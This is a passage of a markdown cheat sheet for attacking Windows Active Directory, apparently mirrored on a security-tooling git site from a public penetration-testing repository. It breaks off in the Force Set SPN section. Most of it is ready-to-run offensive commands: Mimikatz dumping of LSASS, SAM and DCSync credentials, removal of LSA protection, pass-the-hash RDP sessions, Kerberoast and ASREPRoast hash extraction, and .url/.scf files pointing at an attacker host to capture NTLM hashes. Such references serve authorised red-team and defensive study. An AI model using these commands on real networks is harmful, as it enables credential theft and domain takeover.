daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

active-directory-cheat-sheet.md (54297B)


      1 ---
      2 title: "Active-Directory_cheat_sheet"
      3 description: "This cheat sheet contains common enumeration and attack methods for Windows Active Directory."
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: ["active-directory", "adcs", "privilege-escalation", "lateral-movement"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"]
      8 difficulty: intermediate
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/Active-Directory_cheat_sheet.md"
     11 upstreamName: "Active Directory Exploitation Cheat Sheet"
     12 upstreamUrl: "https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet"
     13 upstreamAuthor: "Nikos Katsiopis & Nikos Vourdas (S1ckB0y1337)"
     14 upstreamLicense: "MIT"
     15 upstreamRelation: "verbatim"
     16 upstreamCopyright: "Copyright (c) 2020 Nikos Katsiopis"
     17 ---
     18 # Active Directory Exploitation Cheat Sheet
     19 
     20 This cheat sheet contains common enumeration and attack methods for Windows Active Directory.
     21 
     22 ℹ️ This repository was created by [Nikos Katsiopis](https://www.linkedin.com/in/nikos-katsiopis/) and [Nikos Vourdas](https://www.linkedin.com/in/nickvourd/).
     23 
     24 This cheat sheet is inspired by the [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) repo.
     25 
     26 ![Just Walking The Dog](https://github.com/buftas/Active-Directory-Exploitation-Cheatsheet/blob/master/WalkTheDog.png)
     27 
     28 ## Summary
     29 
     30 - [Active Directory Exploitation Cheat Sheet](#active-directory-exploitation-cheat-sheet)
     31   - [Summary](#summary)
     32   - [Tools](#tools)
     33   - [Domain Enumeration](#domain-enumeration)
     34     - [Using PowerView](#using-powerview)
     35     - [Using AD Module](#using-ad-module)
     36     - [Using BloodHound](#using-bloodhound)
     37       - [Remote BloodHound](#remote-bloodhound)
     38       - [On Site BloodHound](#on-site-bloodhound)
     39     - [Using Adalanche](#using-adalanche)
     40       - [Remote adalanche](#remote-adalanche)
     41     - [Export Enumerated Objects](#export-enumerated-objects)
     42     - [Useful Enumeration Tools](#useful-enumeration-tools)
     43   - [Local Privilege Escalation](#local-privilege-escalation)
     44     - [Useful Local Priv Esc Tools](#useful-local-priv-esc-tools)
     45   - [Lateral Movement](#lateral-movement)
     46     - [Powershell Remoting](#powershell-remoting)
     47     - [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
     48     - [Import a PowerShell Module and Execute its Functions Remotely](#import-a-powershell-module-and-execute-its-functions-remotely)
     49     - [Executing Remote Stateful commands](#executing-remote-stateful-commands)
     50     - [Mimikatz](#mimikatz)
     51     - [Remote Desktop Protocol](#remote-desktop-protocol)
     52     - [URL File Attacks](#url-file-attacks)
     53     - [Useful Tools](#useful-tools)
     54   - [Domain Privilege Escalation](#domain-privilege-escalation)
     55     - [Kerberoast](#kerberoast)
     56     - [ASREPRoast](#asreproast)
     57     - [Password Spray Attack](#password-spray-attack)
     58     - [Force Set SPN](#force-set-spn)
     59     - [Abusing Shadow Copies](#abusing-shadow-copies)
     60     - [List and Decrypt Stored Credentials using Mimikatz](#list-and-decrypt-stored-credentials-using-mimikatz)
     61     - [Unconstrained Delegation](#unconstrained-delegation)
     62     - [Constrained Delegation](#constrained-delegation)
     63     - [Resource Based Constrained Delegation](#resource-based-constrained-delegation)
     64     - [DNSAdmins Abuse](#dnsadmins-abuse)
     65     - [Abusing Active Directory-Integraded DNS](#abusing-active-directory-integraded-dns)
     66     - [Abusing Backup Operators Group](#abusing-backup-operators-group)
     67     - [Abusing Exchange](#abusing-exchange)
     68     - [Weaponizing Printer Bug](#weaponizing-printer-bug)
     69     - [Abusing ACLs](#abusing-acls)
     70     - [Abusing IPv6 with mitm6](#abusing-ipv6-with-mitm6)
     71     - [SID History Abuse](#sid-history-abuse)
     72     - [Exploiting SharePoint](#exploiting-sharepoint)
     73     - [Zerologon](#zerologon)
     74     - [PrintNightmare](#printnightmare)
     75     - [Active Directory Certificate Services](#active-directory-certificate-services)
     76     - [No PAC](#no-pac)
     77   - [Domain Persistence](#domain-persistence)
     78     - [Golden Ticket Attack](#golden-ticket-attack)
     79     - [DCsync Attack](#dcsync-attack)
     80     - [Silver Ticket Attack](#silver-ticket-attack)
     81     - [Skeleton Key Attack](#skeleton-key-attack)
     82     - [DSRM Abuse](#dsrm-abuse)
     83     - [Custom SSP](#custom-ssp)
     84   - [Cross Forest Attacks](#cross-forest-attacks)
     85     - [Trust Tickets](#trust-tickets)
     86     - [Abuse MSSQL Servers](#abuse-mssql-servers)
     87     - [Breaking Forest Trusts](#breaking-forest-trusts)
     88 
     89 ## Tools
     90 
     91 - [Powersploit](https://github.com/PowerShellMafia/PowerSploit/tree/dev)
     92 - [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)
     93 - [Powermad](https://github.com/Kevin-Robertson/Powermad)
     94 - [Impacket](https://github.com/SecureAuthCorp/impacket)
     95 - [Mimikatz](https://github.com/gentilkiwi/mimikatz)
     96 - [Rubeus](https://github.com/GhostPack/Rubeus) -> [Compiled Version](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries)
     97 - [BloodHound](https://github.com/BloodHoundAD/BloodHound)
     98 - [AD Module](https://github.com/samratashok/ADModule)
     99 - [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast)
    100 - [Adalanche](https://github.com/lkarlslund/adalanche)
    101 
    102 ## Domain Enumeration
    103 
    104 ### Using PowerView
    105 
    106 [Powerview v.3.0](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)<br>
    107 [Powerview Wiki](https://powersploit.readthedocs.io/en/latest/)
    108 
    109 - **Get Current Domain:** `Get-Domain`
    110 - **Enumerate Other Domains:** `Get-Domain -Domain <DomainName>`
    111 - **Get Domain SID:** `Get-DomainSID`
    112 - **Get Domain Policy:**
    113 
    114   ```powershell
    115   Get-DomainPolicy
    116 
    117   #Will show us the policy configurations of the Domain about system access or kerberos
    118   Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
    119   Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
    120   ```
    121 
    122 - **Get Domain Controllers:**
    123   ```powershell
    124   Get-DomainController
    125   Get-DomainController -Domain <DomainName>
    126   ```
    127 - **Enumerate Domain Users:**
    128 
    129   ```powershell
    130   #Save all Domain Users to a file
    131   Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
    132 
    133   #Will return specific properties of a specific user
    134   Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
    135 
    136   #Enumerate user logged on a machine
    137   Get-NetLoggedon -ComputerName <ComputerName>
    138 
    139   #Enumerate Session Information for a machine
    140   Get-NetSession -ComputerName <ComputerName>
    141 
    142   #Enumerate domain machines of the current/specified domain where specific users are logged into
    143   Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
    144   ```
    145 
    146 - **Enum Domain Computers:**
    147 
    148   ```powershell
    149   Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
    150 
    151   #Enumerate Live machines
    152   Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
    153   ```
    154 
    155 - **Enum Groups and Group Members:**
    156 
    157   ```powershell
    158   #Save all Domain Groups to a file:
    159   Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
    160 
    161   #Return members of Specific Group (eg. Domain Admins & Enterprise Admins)
    162   Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
    163   Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
    164 
    165   #Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
    166   Get-NetLocalGroup | Select-Object GroupName
    167 
    168   #Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
    169   Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
    170 
    171   #Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
    172   Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
    173   ```
    174 
    175 - **Enumerate Shares:**
    176 
    177   ```powershell
    178   #Enumerate Domain Shares
    179   Find-DomainShare
    180 
    181   #Enumerate Domain Shares the current user has access
    182   Find-DomainShare -CheckShareAccess
    183 
    184   #Enumerate "Interesting" Files on accessible shares
    185   Find-InterestingDomainShareFile -Include *passwords*
    186   ```
    187 
    188 - **Enum Group Policies:**
    189 
    190   ```powershell
    191   Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
    192 
    193   #Enumerate all GPOs to a specific computer
    194   Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
    195 
    196   #Get users that are part of a Machine's local Admin group
    197   Get-DomainGPOComputerLocalGroupMapping -ComputerName <ComputerName>
    198   ```
    199 
    200 - **Enum OUs:**
    201   ```powershell
    202   Get-DomainOU -Properties Name | Sort-Object -Property Name
    203   ```
    204 - **Enum ACLs:**
    205 
    206   ```powershell
    207   # Returns the ACLs associated with the specified account
    208   Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
    209 
    210   #Search for interesting ACEs
    211   Find-InterestingDomainAcl -ResolveGUIDs
    212 
    213   #Check the ACLs associated with a specified path (e.g smb share)
    214   Get-PathAcl -Path "\\Path\Of\A\Share"
    215   ```
    216 
    217 - **Enum Domain Trust:**
    218 
    219   ```powershell
    220   Get-DomainTrust
    221   Get-DomainTrust -Domain <DomainName>
    222 
    223   #Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
    224   Get-DomainTrustMapping
    225   ```
    226 
    227 - **Enum Forest Trust:**
    228 
    229   ```powershell
    230   Get-ForestDomain
    231   Get-ForestDomain -Forest <ForestName>
    232 
    233   #Map the Trust of the Forest
    234   Get-ForestTrust
    235   Get-ForestTrust -Forest <ForestName>
    236   ```
    237 
    238 - **User Hunting:**
    239 
    240   ```powershell
    241   #Finds all machines on the current domain where the current user has local admin access
    242   Find-LocalAdminAccess -Verbose
    243 
    244   #Find local admins on all machines of the domain
    245   Find-DomainLocalGroupMember -Verbose
    246 
    247   #Find computers were a Domain Admin OR a specified user has a session
    248   Find-DomainUserLocation | Select-Object UserName, SessionFromName
    249 
    250   #Confirming admin access
    251   Test-AdminAccess
    252   ```
    253 
    254   :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \
    255   I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> Profit!
    256 
    257 ### Using AD Module
    258 
    259 - **Get Current Domain:** `Get-ADDomain`
    260 - **Enum Other Domains:** `Get-ADDomain -Identity <Domain>`
    261 - **Get Domain SID:** `Get-DomainSID`
    262 - **Get Domain Controlers:**
    263 
    264   ```powershell
    265   Get-ADDomainController
    266   Get-ADDomainController -Identity <DomainName>
    267   ```
    268 
    269 - **Enumerate Domain Users:**
    270 
    271   ```powershell
    272   Get-ADUser -Filter * -Identity <user> -Properties *
    273 
    274   #Get a specific "string" on a user's attribute
    275   Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description
    276   ```
    277 
    278 - **Enum Domain Computers:**
    279   ```powershell
    280   Get-ADComputer -Filter * -Properties *
    281   Get-ADGroup -Filter *
    282   ```
    283 - **Enum Domain Trust:**
    284   ```powershell
    285   Get-ADTrust -Filter *
    286   Get-ADTrust -Identity <DomainName>
    287   ```
    288 - **Enum Forest Trust:**
    289 
    290   ```powershell
    291   Get-ADForest
    292   Get-ADForest -Identity <ForestName>
    293 
    294   #Domains of Forest Enumeration
    295   (Get-ADForest).Domains
    296   ```
    297 
    298 - **Enum Local AppLocker Effective Policy:**
    299 
    300   ```powershell
    301   Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
    302   ```
    303 
    304 ### Using BloodHound
    305 
    306 #### Remote BloodHound
    307 
    308 [Python BloodHound Repository](https://github.com/fox-it/BloodHound.py) or install it with `pip3 install bloodhound`
    309 
    310 ```powershell
    311 bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
    312 ```
    313 
    314 #### On Site BloodHound
    315 
    316 ```powershell
    317 #Using exe ingestor
    318 .\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>
    319 
    320 #Using PowerShell module ingestor
    321 . .\SharpHound.ps1
    322 Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
    323 ```
    324 
    325 ### Using Adalanche
    326 
    327 #### Remote Adalanche
    328 
    329 ```bash
    330 # kali linux:
    331 ./adalanche collect activedirectory --domain <Domain> \
    332 --username <Username@Domain> --password <Password> \
    333 --server <DC>
    334 
    335 # Example:
    336 ./adalanche collect activedirectory --domain windcorp.local \
    337 --username spoNge369@windcorp.local --password 'password123!' \
    338 --server dc.windcorp.htb
    339 ## -> Terminating successfully
    340 
    341 ## Any error?:
    342 
    343 # LDAP Result Code 200 "Network Error": x509: certificate signed by unknown authority ?
    344 
    345 ./adalanche collect activedirectory --domain windcorp.local \
    346 --username spoNge369@windcorp.local --password 'password123!' \
    347 --server dc.windcorp.htb --tlsmode NoTLS --port 389
    348 
    349 # Invalid Credentials ?
    350 ./adalanche collect activedirectory --domain windcorp.local \
    351 --username spoNge369@windcorp.local --password 'password123!' \
    352 --server dc.windcorp.htb --tlsmode NoTLS --port 389 \
    353 --authmode basic
    354 
    355 # Analyze data 
    356 # go to web browser -> 127.0.0.1:8080
    357 ./adalanche analyze
    358 ```
    359 
    360 #### Export Enumerated Objects
    361 
    362 You can export enumerated objects from any module/cmdlet  into an XML file for later ananlysis.
    363 
    364 The `Export-Clixml` cmdlet creates a Common Language Infrastructure (CLI) XML-based representation of an object or objects and stores it in a file. You can then use the `Import-Clixml` cmdlet to recreate the saved object based on the contents of that file.
    365 
    366 ```powershell
    367 # Export Domain users to xml file.
    368 Get-DomainUser | Export-CliXml .\DomainUsers.xml
    369 
    370 # Later, when you want to utilise them for analysis even on any other machine.
    371 $DomainUsers = Import-CliXml .\DomainUsers.xml
    372 
    373 # You can now apply any condition, filters, etc.
    374 
    375 $DomainUsers | select name
    376 
    377 $DomainUsers | ? {$_.name -match "User's Name"}
    378 ```
    379 
    380 ### Useful Enumeration Tools
    381 
    382 - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) Information dumper via LDAP
    383 - [adidnsdump](https://github.com/dirkjanm/adidnsdump) Integrated DNS dumping by any authenticated user
    384 - [ACLight](https://github.com/cyberark/ACLight) Advanced Discovery of Privileged Accounts
    385 - [ADRecon](https://github.com/sense-of-security/ADRecon) Detailed Active Directory Recon Tool
    386 
    387 ## Local Privilege Escalation
    388 
    389 - [Windows Local Privilege Escalation Cookbook](https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook) Cookbook for Windows Local Privilege Escalations
    390 
    391 - [Juicy Potato](https://github.com/ohpe/juicy-potato) Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation
    392 
    393   :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
    394 
    395 - [Lovely Potato](https://github.com/TsukiCTF/Lovely-Potato) Automated Juicy Potato
    396 
    397   :warning: Works only until Windows Server 2016 and Windows 10 until patch 1803
    398 
    399 - [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) Exploit the PrinterBug for System Impersonation
    400 
    401   :pray: Works for Windows Server 2019 and Windows 10
    402 
    403 - [RoguePotato](https://github.com/antonioCoco/RoguePotato) Upgraded Juicy Potato
    404 
    405   :pray: Works for Windows Server 2019 and Windows 10
    406 
    407 - [Abusing Token Privileges](https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/)
    408 - [SMBGhost CVE-2020-0796](https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/) \
    409   [PoC](https://github.com/danigargu/CVE-2020-0796)
    410 - [CVE-2021-36934 (HiveNightmare/SeriousSAM)](https://github.com/cube0x0/CVE-2021-36934)
    411 
    412 ### Useful Local Priv Esc Tools
    413 
    414 - [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1) Misconfiguration Abuse
    415 - [BeRoot](https://github.com/AlessandroZ/BeRoot) General Priv Esc Enumeration Tool
    416 - [Privesc](https://github.com/enjoiz/Privesc) General Priv Esc Enumeration Tool
    417 - [FullPowers](https://github.com/itm4n/FullPowers) Restore A Service Account's Privileges
    418 
    419 ## Lateral Movement
    420 
    421 ### PowerShell Remoting
    422 
    423 ```powershell
    424 #Enable PowerShell Remoting on current Machine (Needs Admin Access)
    425 Enable-PSRemoting
    426 
    427 #Entering or Starting a new PSSession (Needs Admin Access)
    428 $sess = New-PSSession -ComputerName <Name>
    429 Enter-PSSession -ComputerName <Name> OR -Sessions <SessionName>
    430 ```
    431 
    432 ### Remote Code Execution with PS Credentials
    433 
    434 ```powershell
    435 $SecPassword = ConvertTo-SecureString '<Wtver>' -AsPlainText -Force
    436 $Cred = New-Object System.Management.Automation.PSCredential('htb.local\<WtverUser>', $SecPassword)
    437 Invoke-Command -ComputerName <WtverMachine> -Credential $Cred -ScriptBlock {whoami}
    438 ```
    439 
    440 ### Import a PowerShell Module and Execute its Functions Remotely
    441 
    442 ```powershell
    443 #Execute the command and start a session
    444 Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1 -Session $sess
    445 
    446 #Interact with the session
    447 Enter-PSSession -Session $sess
    448 
    449 ```
    450 
    451 ### Executing Remote Stateful commands
    452 
    453 ```powershell
    454 #Create a new session
    455 $sess = New-PSSession -ComputerName <NameOfComputer>
    456 
    457 #Execute command on the session
    458 Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
    459 
    460 #Check the result of the command to confirm we have an interactive session
    461 Invoke-Command -Session $sess -ScriptBlock {$ps}
    462 ```
    463 
    464 ### Mimikatz
    465 
    466 ```powershell
    467 #The commands are in cobalt strike format!
    468 
    469 #Dump LSASS:
    470 mimikatz privilege::debug
    471 mimikatz token::elevate
    472 mimikatz sekurlsa::logonpasswords
    473 
    474 #(Over) Pass The Hash
    475 mimikatz privilege::debug
    476 mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>
    477 
    478 #List all available kerberos tickets in memory
    479 mimikatz sekurlsa::tickets
    480 
    481 #Dump local Terminal Services credentials
    482 mimikatz sekurlsa::tspkg
    483 
    484 #Dump and save LSASS in a file
    485 mimikatz sekurlsa::minidump c:\temp\lsass.dmp
    486 
    487 #List cached MasterKeys
    488 mimikatz sekurlsa::dpapi
    489 
    490 #List local Kerberos AES Keys
    491 mimikatz sekurlsa::ekeys
    492 
    493 #Dump SAM Database
    494 mimikatz lsadump::sam
    495 
    496 #Dump SECRETS Database
    497 mimikatz lsadump::secrets
    498 
    499 #Inject and dump the Domain Controler's Credentials
    500 mimikatz privilege::debug
    501 mimikatz token::elevate
    502 mimikatz lsadump::lsa /inject
    503 
    504 #Dump the Domain's Credentials without touching DC's LSASS and also remotely
    505 mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
    506 
    507 #Dump old passwords and NTLM hashes of a user
    508 mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history
    509 
    510 #List and Dump local kerberos credentials
    511 mimikatz kerberos::list /dump
    512 
    513 #Pass The Ticket
    514 mimikatz kerberos::ptt <PathToKirbiFile>
    515 
    516 #List TS/RDP sessions
    517 mimikatz ts::sessions
    518 
    519 #List Vault credentials
    520 mimikatz vault::list
    521 ```
    522 
    523 :exclamation: What if mimikatz fails to dump credentials because of LSA Protection controls ?
    524 
    525 - LSA as a Protected Process (Kernel Land Bypass)
    526 
    527   ```powershell
    528   #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
    529   reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    530 
    531   #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
    532   #Now lets import the mimidriver.sys to the system
    533   mimikatz # !+
    534 
    535   #Now lets remove the protection flags from lsass.exe process
    536   mimikatz # !processprotect /process:lsass.exe /remove
    537 
    538   #Finally run the logonpasswords function to dump lsass
    539   mimikatz # sekurlsa::logonpasswords
    540   ```
    541 
    542 - LSA as a Protected Process (Userland "Fileless" Bypass)
    543 
    544   - [PPLdump](https://github.com/itm4n/PPLdump)
    545   - [Bypassing LSA Protection in Userland](https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland)
    546 
    547 - LSA is running as virtualized process (LSAISO) by Credential Guard
    548 
    549   ```powershell
    550   #Check if a process called lsaiso.exe exists on the running processes
    551   tasklist |findstr lsaiso
    552 
    553   #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
    554   #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
    555   mimikatz # misc::memssp
    556 
    557   #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
    558   ```
    559 
    560 - [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821)
    561 - [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a)
    562 
    563 ### Remote Desktop Protocol
    564 
    565 If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.
    566 
    567 - Mimikatz:
    568 
    569   ```powershell
    570   #We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
    571   privilege::debug
    572   sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
    573 
    574   #Then just click ok on the RDP dialogue and enjoy an interactive session as the user we impersonated
    575   ```
    576 
    577 - xFreeRDP:
    578 
    579 ```powershell
    580 xfreerdp  +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore /bpp:8  /u:<Username> /pth:<NTLMHash> /v:<Hostname | IPAddress>
    581 ```
    582 
    583 :exclamation: If Restricted Admin mode is disabled on the remote machine we can connect on the host using another tool/protocol like psexec or winrm and enable it by creating the following registry key and setting it's value zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
    584 
    585 - Bypass "Single Session per User" Restriction
    586 
    587 On a domain computer, if you have command execution as the system or local administrator and want an RDP session that another user is already using, you can get around the single session restriction by adding the following registry key:
    588 ```powershell
    589 REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0
    590 ```
    591 
    592 Once you've completed the desired stuff, you can delete the key to reinstate the single-session-per-user restriction.
    593 ```powershell
    594 REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUse
    595 ```
    596 
    597 
    598 ### URL File Attacks
    599 
    600 - .url file
    601 
    602   ```
    603   [InternetShortcut]
    604   URL=whatever
    605   WorkingDirectory=whatever
    606   IconFile=\\<AttackersIp>\%USERNAME%.icon
    607   IconIndex=1
    608   ```
    609 
    610   ```
    611   [InternetShortcut]
    612   URL=file://<AttackersIp>/leak/leak.html
    613   ```
    614 
    615 - .scf file
    616 
    617   ```
    618   [Shell]
    619   Command=2
    620   IconFile=\\<AttackersIp>\Share\test.ico
    621   [Taskbar]
    622   Command=ToggleDesktop
    623   ```
    624 
    625 Putting these files in a writeable share the victim only has to open the file explorer and navigate to the share. **Note** that the file doesn't need to be opened or the user to interact with it, but it must be on the top of the file system or just visible in the windows explorer window in order to be rendered. Use responder to capture the hashes.
    626 
    627 :exclamation: .scf file attacks won't work on the latest versions of Windows.
    628 
    629 ### Useful Tools
    630 
    631 - [Powercat](https://github.com/besimorhino/powercat) netcat written in powershell, and provides tunneling, relay and portforward
    632   capabilities.
    633 - [SCShell](https://github.com/Mr-Un1k0d3r/SCShell) fileless lateral movement tool that relies on ChangeServiceConfigA to run command
    634 - [Evil-Winrm](https://github.com/Hackplayers/evil-winrm) the ultimate WinRM shell for hacking/pentesting
    635 - [RunasCs](https://github.com/antonioCoco/RunasCs) Csharp and open version of windows builtin runas.exe
    636 - [ntlm_theft](https://github.com/Greenwolf/ntlm_theft.git) creates all possible file formats for url file attacks
    637 
    638 ## Domain Privilege Escalation
    639 
    640 ### Kerberoast
    641 
    642 _WUT IS DIS?:_ \
    643  All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"  
    644  account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
    645 
    646 - PowerView:
    647 
    648   ```powershell
    649   #Get User Accounts that are used as Service Accounts
    650   Get-NetUser -SPN
    651 
    652   #Get every available SPN account, request a TGS and dump its hash
    653   Invoke-Kerberoast
    654 
    655   #Requesting the TGS for a single account:
    656   Request-SPNTicket
    657 
    658   #Export all tickets using Mimikatz
    659   Invoke-Mimikatz -Command '"kerberos::list /export"'
    660   ```
    661 
    662 - AD Module:
    663 
    664   ```powershell
    665   #Get User Accounts that are used as Service Accounts
    666   Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
    667   ```
    668 
    669 - Impacket:
    670 
    671   ```powershell
    672   python GetUserSPNs.py <DomainName>/<DomainUser>:<Password> -outputfile <FileName>
    673   ```
    674 
    675 - Rubeus:
    676 
    677   ```powershell
    678   #Kerberoasting and outputing on a file with a specific format
    679   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
    680 
    681   #Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
    682   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
    683 
    684   #Kerberoast AES enabled accounts
    685   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
    686 
    687   #Kerberoast specific user account
    688   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
    689 
    690   #Kerberoast by specifying the authentication credentials
    691   Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>
    692   ```
    693 
    694 ### ASREPRoast
    695 
    696 _WUT IS DIS?:_ \
    697  If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encrypted  
    698  blob and bruteforce it offline.
    699 
    700 - PowerView: `Get-DomainUser -PreauthNotRequired -Verbose`
    701 - AD Module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth`
    702 
    703 Forcefully Disable Kerberos Preauth on an account i have Write Permissions or more!
    704 Check for interesting permissions on accounts:
    705 
    706 **Hint:** We add a filter e.g. RDPUsers to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
    707 
    708 PowerView:
    709 
    710 ```powershell
    711 Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
    712 Disable Kerberos Preauth:
    713 Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
    714 Check if the value changed:
    715 Get-DomainUser -PreauthNotRequired -Verbose
    716 ```
    717 
    718 - And finally execute the attack using the [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) tool.
    719 
    720   ```powershell
    721   #Get a specific Accounts hash:
    722   Get-ASREPHash -UserName <UserName> -Verbose
    723 
    724   #Get any ASREPRoastable Users hashes:
    725   Invoke-ASREPRoast -Verbose
    726   ```
    727 
    728 - Using Rubeus:
    729 
    730   ```powershell
    731   #Trying the attack for all domain users
    732   Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    733 
    734   #ASREPRoast specific user
    735   Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    736 
    737   #ASREPRoast users of a specific OU (Organization Unit)
    738   Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
    739   ```
    740 
    741 - Using Impacket:
    742 
    743   ```powershell
    744   #Trying the attack for the specified users on the file
    745   python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
    746   ```
    747 
    748 ### Password Spray Attack
    749 
    750 If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse
    751 on other domain accounts.
    752 
    753 **Tools:**
    754 
    755 - [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)
    756 - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
    757 - [Invoke-CleverSpray](https://github.com/wavestone-cdt/Invoke-CleverSpray)
    758 - [Spray](https://github.com/Greenwolf/Spray)
    759 
    760 ### Force Set SPN
    761 
    762 _WUT IS DIS ?:
    763 If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and bruteforce it._
    764 
    765 - PowerView:
    766 
    767   ```powershell
    768   #Check for interesting permissions on accounts:
    769   Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
    770 
    771   #Check if current user has already an SPN setted:
    772   Get-DomainUser -Identity <UserName> | select serviceprincipalname
    773 
    774   #Force set the SPN on the account:
    775   Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
    776   ```
    777 
    778 - AD Module:
    779 
    780   ```powershell
